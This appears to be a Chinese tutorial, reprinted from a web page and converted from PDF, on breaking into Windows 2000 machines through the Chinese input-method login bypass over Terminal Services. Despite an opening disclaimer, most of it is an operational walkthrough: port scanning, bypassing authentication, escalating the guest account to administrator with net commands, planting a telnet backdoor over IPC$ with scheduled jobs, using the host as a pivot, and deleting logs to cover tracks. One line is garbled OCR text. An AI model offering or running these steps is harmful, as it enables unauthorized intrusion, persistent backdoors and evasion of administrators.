网络构件:Win2K中文版输入法漏洞入侵攻略 PDF转换可能丢 失图片或格式,建议阅读原文

https://www.100test.com/kao\_ti2020/250/2021\_2022\_\_E7\_BD\_91\_ E7\_BB\_9C\_E6\_9E\_84\_E4\_c40\_250399.htm 注:本文目的在于提 醒网管注意,加强网管网络安全意识,提高网管网络安全技 术水平,并不赞同用此法进行违法犯罪活动。WIN2000中文 简体版存在的输入法漏洞,可以使本地用户绕过身分验证机 制进入系统内部。经实验,WIN2000中文简体版的终端服务

,在远程操作时仍然存在这一漏洞,而且危害更大WIN2000 的终端服务功能,能使系统管理员对WIN2000进行远程操作 ,采用的是图形界面,能使用户在远程控制计算机时功能与 在本地使用一样,其默认端口为3389,用户只要装 了WIN2000的客户端连接管理器就能与开启了该服务的计算 机相联。因此这一漏洞使终端服务成为WIN2000的合法木马 。工具:客户端连接管理器,下载地址

: http://minisql.51.net/rj/WIN.zip,端口扫描器一个,推荐使用:流光、网络刺客2、superscan。入侵步骤:一,获得管理员账号:我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出"帮助" (如果发现"帮助"呈灰色,放弃,因为对方很可能发现并 已经补上了这个漏洞),打开"帮助"一栏中"操作指南",在最上面的任务栏点击右键,会弹出一个菜单,打开"跳至URL"。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按"确定",于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在"属性"-."目标"

- .c:\winnt\system32\net.exe后面空一格,填入"user guest /active :yes"点"确定"。这一步骤目的在于用net.exe激活被禁止使用 的guest账户,当然也可以利用"user 用户名 密码 / add",创建 一个新账号,但容易引起网管怀疑。运行该快捷方式,此时 你不会看到运行状态,但guest用户已被激活。然后又修改该 快捷方式,填入"user guest 密码",运行,于是guest便有了密 码。最后,再次修改,填入"localgroup administrators guest /add,将guest变成系统管理员。注意事项:1、在这过程中 ,如果对方管理员正在使用终端服务管理器,他将看到你所

,如采为力管理负止往使用终端减劳管理器,他将管到亦所打开的进程id,你的ip和机器名,甚至能够给你发送消息。2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。3、你所看到的图像与操作会有所延迟,这受网速的影响。二,创建跳板:再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开"控制面板",进入"网络和拔号连接",在"本地连接"或"拔号连接"中查看属性,看对方是否选择"Microsoft 网络

的文件和打印机共享",如果没有,就打上勾。对方如果使 用的是拔号上网,下次拔号网络共享才会打开。 退出对方系 统,在本地机命令提示符下,输入net use \\IP Address\IPC\$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。登 陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录 下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用) ,这个程序是在对方上面开一个Telnet服务,端口是99。 copy c:\hack\srv.exe \\\*\*\*.\*\*\*.\*\*\*\admin\$然后利用定时服务启动 它,先了解对方的时间:net time \\\*\*\*.\*\*\*.\*\*\*显示 : \\\*\*\* \*\*\* \*\*\* 的当前时间是 2001/1/8 下午 08:55 命令成功 完成。然后启动srv.exe:at \\\*\*\* \*\*\* \*\*\* 09:00 srv.exe 显示:新 加了一项作业,其作业 ID = 0 过几分钟后, telnet \*\*\*.\*\*\*.\*\*\* 99 这里不需要验证身份,直接登录,显示 : c:\winnt:\system32. 我们就成功登陆上去了。然后又在本地 打开命令提示符,另开一个窗口,输入:copy c:\hack\ntlm.exe \\211.21.193.202\admin\$把事先存放在hack目录 里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运 行ntlm.exe C:\WINNT\system32.ntlm显示:Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done!C:\WINNT\system32.C:\WINNT\system32.好,现在我们 来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务 : net stop telnet 系统告诉你并没有启动telnet,不理它,继续 : net start telnet 这次真的启动了telnet,我们可以在另开的命 令提示符窗口telnet到对方的23端口,验证身份,输入我们 的guest账号和密码,它就真正成为我们的跳板了。我们可以 利用它到其它的主机去。三、扫除脚印:删除为net.exe 创建

的快捷方式,删除winnt\system32\logfiles下边的日志文件补漏 方法:1、打补丁2、删除输入法帮助文件3、停止终端服务。 100Test下载频道开通,各类考试题目直接下载。详细请访问 www.100test.com